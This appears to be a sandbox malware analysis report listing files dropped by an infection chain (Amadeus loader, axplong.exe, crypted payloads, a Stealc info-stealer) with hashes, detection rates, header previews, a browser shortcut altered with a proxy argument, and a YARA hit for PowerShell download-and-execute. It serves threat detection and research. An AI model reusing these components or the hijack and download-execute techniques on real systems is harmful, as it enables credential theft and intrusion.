Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Thu Oct 5 07:36:31 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
Category:	dropped
Size (bytes):	2104
Entropy (8bit):	3.4643093029392285
Encrypted:	false
SSDEEP:	48:8S2T0dYTclzRYrnvPdAKRkdAGdAKRFdAKR1:8S2T7r
MD5:	BDE1236EED759DEBBF11D96F1603BDDE
SHA1:	B8E657CFBB525B6FED201F87B161AC1F89121C3F
SHA-256:	41F4C78C7D706DAC4F9DC2FD71E84179640A1E2E40B7C2CCBB2A7578A6340311
SHA-512:	2406C0AD2E00700BC04D30D3A1DC8C6FF69E1344893B9766014806D7C71D5A804BA0D7880157EA9CE0ACFA19F6474BDDFEA817DC9468D52B49B79FDAFF5E2072
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ......,....IU..g......q.... y1.....................#....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.IEWqD....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VEW+B....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VEW+B....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VEW @..........................."&.A.p.p.l.i.c.a.t.i.o.n.....`.2. y1.;W.+ .chrome.exe..F......CW.VEW.D..........................,.6.c.h.r.o.m.e...e.x.e.......d...............-.......c............F.......C:\Program Files\Google\Chrome\Application\chrome.exe....A.c.c.e.s.s. .t.h.e. .I.n.t.e.r.n.e.t.;.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.!.-.-.p.r.o.x.y.-.s.e.r.v.e.r

C:\Users\user\1000238002\Amadeus.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5562368
Entropy (8bit):	6.39372886031857
Encrypted:	false
SSDEEP:	49152:NXJxAIQfc7wXnJu1U30/jo5UJZUntHvVkgKJswamhqp1ROjyj/2wW0j94lNI/pB+:BAIdik7/junt/2wr3/
MD5:	36A627B26FAE167E6009B4950FF15805
SHA1:	F3CB255AB3A524EE05C8BAB7B4C01C202906B801
SHA-256:	A2389DE50F83A11D6FE99639FC5C644F6D4DCEA6834ECBF90A4EAD3D5F36274A
SHA-512:	2133ABA3E2A41475B2694C23A9532C238ABAB0CBAE7771DE83F9D14A8B2C0905D44B1BA0B1F7AAE501052F4EBA0B6C74018D66C3CBC8E8E3443158438A621094
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 37%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........R...............$..l....... ........J...@...........................W.......U...@...................................R.L.....T.......................R......................................................J..............................text...x.$.......$................. ..`.rdata..d.%...$...%...$.............@..@.data...`.....J.......J.............@....idata..L.....R.......P.............@....reloc........R......$P.............@..B.symtab.......T.......R................B.rsrc.........T.......R.............@..@........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CZjRdKVnFB.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1119
Entropy (8bit):	5.345080863654519
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0Hj
MD5:	88593431AEF401417595E7A00FE86E5F
SHA1:	1714B8F6F6DCAAB3F3853EDABA7687F16DD331F4
SHA-256:	ED5E60336FB00579E0867B9615CBD0C560BB667FE3CEE0674F690766579F1032
SHA-512:	1D442441F96E69D8A6D5FB7E8CF01F13AF88CA2C2D0960120151B15505DD1CADC607EF9983373BA8E422C65FADAB04A615968F335A875B5C075BB9A6D0F346C9
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3274
Entropy (8bit):	5.3318368586986695
Encrypted:	false
SSDEEP:	96:Pq5qHwCYqh3oPtI6eqzxP0aymRLKTqdqlq7qqjqc85VD:Pq5qHwCYqh3qtI6eqzxP0at9KTqdqlq0
MD5:	0C1110E9B7BBBCB651A0B7568D796468
SHA1:	7AEE00407EE27655FFF0ADFBC96CF7FAD9610AAA
SHA-256:	112E21404A85963FB5DF8388F97429D6A46E9D4663435CC86267C563C0951FA2
SHA-512:	46E37552764B4E61006AB99F8C542D55B2418668B097D3C6647D306604C3D7CA3FAF34F8B4121D94B0E7168295B2ABEB7C21C3B96F37208943537B887BC81590
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\build.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000241001\build.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1119
Entropy (8bit):	5.345080863654519
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0Hj
MD5:	88593431AEF401417595E7A00FE86E5F
SHA1:	1714B8F6F6DCAAB3F3853EDABA7687F16DD331F4
SHA-256:	ED5E60336FB00579E0867B9615CBD0C560BB667FE3CEE0674F690766579F1032
SHA-512:	1D442441F96E69D8A6D5FB7E8CF01F13AF88CA2C2D0960120151B15505DD1CADC607EF9983373BA8E422C65FADAB04A615968F335A875B5C075BB9A6D0F346C9
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\crypted.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	42
Entropy (8bit):	4.0050635535766075
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUy:Q3La/xwQ
MD5:	84CFDB4B995B1DBF543B26B86C863ADC
SHA1:	D2F47764908BF30036CF8248B9FF5541E2711FA2
SHA-256:	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
SHA-512:	485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\crypteda.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	42
Entropy (8bit):	4.0050635535766075
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUy:Q3La/xwQ
MD5:	84CFDB4B995B1DBF543B26B86C863ADC
SHA1:	D2F47764908BF30036CF8248B9FF5541E2711FA2
SHA-256:	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
SHA-512:	485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rHCHrI9F0v.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3274
Entropy (8bit):	5.3318368586986695
Encrypted:	false
SSDEEP:	96:Pq5qHwCYqh3oPtI6eqzxP0aymRLKTqdqlq7qqjqcEZ5D:Pq5qHwCYqh3qtI6eqzxP0at9KTqdqlqY
MD5:	0B2E58EF6402AD69025B36C36D16B67F
SHA1:	5ECC642327EF5E6A54B7918A4BD7B46A512BF926
SHA-256:	4B0FB8EECEAD6C835CED9E06F47D9021C2BCDB196F2D60A96FEE09391752C2D7
SHA-512:	1464106CEC5E264F8CEA7B7FF03C887DA5192A976FBC9369FC60A480A7B9DB0ED1956EFCE6FFAD2E40A790BD51FD27BB037256964BC7B4B2DA6D4D5C6B267FA1
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\Setup[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6647095
Entropy (8bit):	6.633275439634301
Encrypted:	false
SSDEEP:	49152:fOnmFINjZnQl4uiQPnLX31zGXnmUYKLvOh7V0okZagCVJe8SxR26PoXw0rz1rlDh:fnnLlhut031rl27FpfLjnRbJkC9BXNk1
MD5:	7ADB5E2E04A5DCADA12236D363F6A4C4
SHA1:	31DF5F1B2F938F5E2DC24F7476C6A65E5C72A090
SHA-256:	E4EB8D8749C137084F9C2AB212E0B58799B66EE9548C3B886EFEDD9BBCD8676C
SHA-512:	8386ACC0569404991E42488E1601A571DAFC3B9A1880EE4647A7B6A9F0BE09F44B1022355ABA774305E1A25C3A7A4AAF96381418BBFB08B6D8C308C0AEFFA3ED
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 46%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.._..%.........#..G..jZ...f...........G...@..................................Hf....... ......................P..B....`...................................(...........................H......................a...............................text...$.G.......G.................`.P`.data.........G.......G.............@.`..rdata........H.......G.............@.`@/4......$.....H.......H.............@.0@.bss......f..`L.......................`..edata..B....P.......6L.............@.0@.idata.......`.......8L.............@.0..CRT....4....p.......BL.............@.0..tls.................DL.............@.0..reloc...(.......*...FL.............@.0B/14..................pZ.............@..B/29.................xZ.............@..B/41.....XL.......N... \.............@..B/55.....B............n\.............@..B/67.....T............R].............@.0B/80.....a............p].

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Amadeus[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5562368
Entropy (8bit):	6.39372886031857
Encrypted:	false
SSDEEP:	49152:NXJxAIQfc7wXnJu1U30/jo5UJZUntHvVkgKJswamhqp1ROjyj/2wW0j94lNI/pB+:BAIdik7/junt/2wr3/
MD5:	36A627B26FAE167E6009B4950FF15805
SHA1:	F3CB255AB3A524EE05C8BAB7B4C01C202906B801
SHA-256:	A2389DE50F83A11D6FE99639FC5C644F6D4DCEA6834ECBF90A4EAD3D5F36274A
SHA-512:	2133ABA3E2A41475B2694C23A9532C238ABAB0CBAE7771DE83F9D14A8B2C0905D44B1BA0B1F7AAE501052F4EBA0B6C74018D66C3CBC8E8E3443158438A621094
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 37%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........R...............$..l....... ........J...@...........................W.......U...@...................................R.L.....T.......................R......................................................J..............................text...x.$.......$................. ..`.rdata..d.%...$...%...$.............@..@.data...`.....J.......J.............@....idata..L.....R.......P.............@....reloc........R......$P.............@..B.symtab.......T.......R................B.rsrc.........T.......R.............@..@........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\crypted[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	322048
Entropy (8bit):	7.985128056067976
Encrypted:	false
SSDEEP:	6144:d/vtLE/OOyVWU4MaqmF5N5KtkuDuPH8AVZG0QMMRhgO+sPnxl:ddo/OOyFXptkusHZLGlRhV+sPnj
MD5:	6134586375C01F97F8777BAE1BF5ED98
SHA1:	4787FA996B75DBC54632CC321725EE62666868A1
SHA-256:	414BECB8AABD4E8C406E84DF062BEE1A45CFFA334AE30022078CFA71DA9E330D
SHA-512:	652ED16D96B5700F105C2BAB8E7258F167BC1615B6397BE7340C08DF7C977842844326E07FDEF677AECFAF07263F99BB7968C9FC926E90E5A33D2ED793F8436B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 83%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`..f................................. ........@.. .......................@......._....`.................................X...S............................ ...... ................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.......x...................................................................B...(..\|=C5H..........<6..2.......&...+.3..*....g^.c..F1..u....p.(C...:..(..S+..?.EV...\.K..........x...M.r..=62`.~B5=......rQ..-]@m...1wL6RH......T..Z.+.....\|....6....iP".g.....,..d.l....b....$?=s.jL...l.N.A.B......<<.Y.5...........s.T..<....]....M&R\|.......P.E:j....Q.N9r"...,....N.uT..Y..r.Y...........M.9...I..`.5............H........e..c..:[.d2{....{n9.9u....)b.S............b.1.9

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\freebl3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\svchost015.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\mozglue[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\svchost015.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\msvcp140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\svchost015.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\nss3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\svchost015.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\runtime[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	modified
Size (bytes):	45056
Entropy (8bit):	6.216673519026734
Encrypted:	false
SSDEEP:	768:fcbuPx+zgDwfIH/335cJX2om4VQRIEvmg5+FOKo5h:flxT1H/335C2ozVQRItgMF4h
MD5:	B73CF29C0EA647C353E4771F0697C41F
SHA1:	3E5339B80DCFBDC80D946FC630C657654EF58DE7
SHA-256:	EDD76F144BBDBFC060F7CB7E19863F89EB55863EFC1A913561D812083B6306CD
SHA-512:	2274D4C1E0EF72DC7E73B977E315DDD5472EC35A52E3449B1F6B87336EE18FF8966FED0451D19D24293FDE101E0C231A3CAA08B7BD0047A18A41466C2525E2E8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 58%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....I..........."...0.................. ........@.. ....................... ............@.................................:...O.......................................8............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................n.......H........1..............xJ.. y............................................~....}.....~....}.....~....}.....(.....(......{....t....}....6..s....(.......0..>........{....r...po...........o....&..{........(....(....}.....(.......0..!.........{........(....(....}.....(........0..!.........{........(....(....}.....(........0..!.........{........(....(....}.....(........0..!.........{........(....(....}.....(........0..!.........{........(....(....}.....(........0..!.......

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\softokn3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\svchost015.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\stealc_default2[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	192000
Entropy (8bit):	6.395265378509869
Encrypted:	false
SSDEEP:	3072:QJlVTFj5qDao8KaxfE54HnnGSail+bOX8bX60UFHJKa:QJP5j5Ka2aOanGSabY860UFpKa
MD5:	7A02AA17200AEAC25A375F290A4B4C95
SHA1:	7CC94CA64268A9A9451FB6B682BE42374AFC22FD
SHA-256:	836799FD760EBA25E15A55C75C50B977945C557065A708317E00F2C8F965339E
SHA-512:	F6EBFE7E087AA354722CEA3FDDD99B1883A862FB92BB5A5A86782EA846A1BFF022AB7DB4397930BCABAA05CB3D817DE3A89331D41A565BC1DA737F2C5E3720B6
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\stealc_default2[1].exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b...............u^......uk......u_......{v.....fz.......{f..............uZ......uh.....Rich............PE..L......f.....................B"......d............@..........................0$...........@....................................<.............................#..$...................................................................................text...J........................... ....rdata..............................@..@.data....+!.........................@....reloc..*D....#..F..................@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\vcruntime140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\svchost015.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
